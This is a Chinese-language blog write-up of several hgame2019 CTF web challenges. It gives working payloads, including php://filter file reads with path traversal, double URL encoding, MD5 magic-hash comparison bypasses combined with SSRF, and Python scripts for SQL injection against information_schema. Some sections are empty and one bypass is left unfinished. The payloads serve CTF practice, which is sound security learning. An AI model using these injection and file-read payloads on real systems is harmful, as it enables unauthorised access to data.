iloveflag-blog

hgame2019 部分web-wp

字数统计: 590阅读时长: 3 min
2019/02/22 Share

Level-week 1

谁吃了我的flag:

根据题目提示可以看出是vim泄露
vim -r http://118.25.111.31:10086/.index.html.swp

换头大作战:

very easy web:

url双次编码绕过
http://120.78.184.111:8080/week1/very_ez/index.php?id=%2576%2569%2564%2561%2572

can u find me?:

Level-week 2

easy_php:

http://118.24.25.25:9999/easyphp/img/index.php?img=php://filter/read=convert.base64-encode/resource=….//flag

some php tricks:

md5弱类型比较加ssrf
http://118.24.3.214:3001/?str1=240610708&str2=s878926199a&str3[]=240610708&str4[]=s878926199a&H.game[]=10000e&url=http://@127.0.0.1:80@www.baidu.com/admin.php?filename=php://filter/read=convert.base64-encode/resource=flag.php

baby-spider:

1.不伪装头部第十次post关机代码

2.css样式导致爬虫下来的并不是真正显示的题目

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import requests
import re
import sys
header = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
"Accept": "text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8"}
url1="http://111.231.140.29:10000"
session=requests.Session()
data1={
'token':'PBbMpC54RK0j4s5eZhakGwBQN5Yz7DOV'
}
r1=session.post(url1,data=data1)
url2="http://111.231.140.29:10000/question"
r2=session.get(url2)
demo=r2.text
rst1=re.search('(.+?)',demo)
if rst1:
go=eval(rst1.group(1)[:-2])
url3="http://111.231.140.29:10000/solution"
for i in range(10):
data2={
'answer':go
}
r3=session.post(url3,headers=header,data=data2)
demo2=r3.text
rst3=re.search('(.+?)',demo2)
if rst3:
go=eval(rst3.group(1)[:-2])
print(demo2)
print(go)
dataflag={
'answer':go
}
flag=session.post(url3,headers=header,data=dataflag)
print(flag.text)

一部分,未完成第二个绕过

Level-week 3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
import requests
import hashlib
url = "http://118.89.111.179:3000"
cookie={'PHPSESSID':'bcsjkikm26hfpfq502ogcklf6d'}
def getcode():
rlt = requests.get(url,cookies=cookie)
print(rlt.text)
code=rlt.text[-18:-14]
for i in range(0,9999999):
if hashlib.md5(str(i).encode()).hexdigest()[0:4] == code:
answer=str(i)
break
print(answer)
return answer
def sqlcode(go):
answer = getcode()
url1=url+"/?code="+answer+"&id="+go
r = requests.get(url=url1,cookies=cookie)
print(url1)
print(r.text)
a="1 union select database()#"
# 获取数据库
b="1 union select group_concat(table_name) from information_schema.tables where table_schema='hgame'#"
#获取表名
c="1 union select (select column_name from information_schema.columns where table_schema='hgame' and table_name='f1l1l1l1g' limit 0,1)%23"
#获取列名
d="1 union select f14444444g from hgame.f1l1l1l1g"
sqlcode(d)
CATALOG
  1. 1. Level-week 1
    1. 1.1. 谁吃了我的flag:
    2. 1.2. 换头大作战:
    3. 1.3. very easy web:
    4. 1.4. can u find me?:
  2. 2. Level-week 2
    1. 2.1. easy_php:
    2. 2.2. some php tricks:
    3. 2.3. baby-spider:
  3. 3. Level-week 3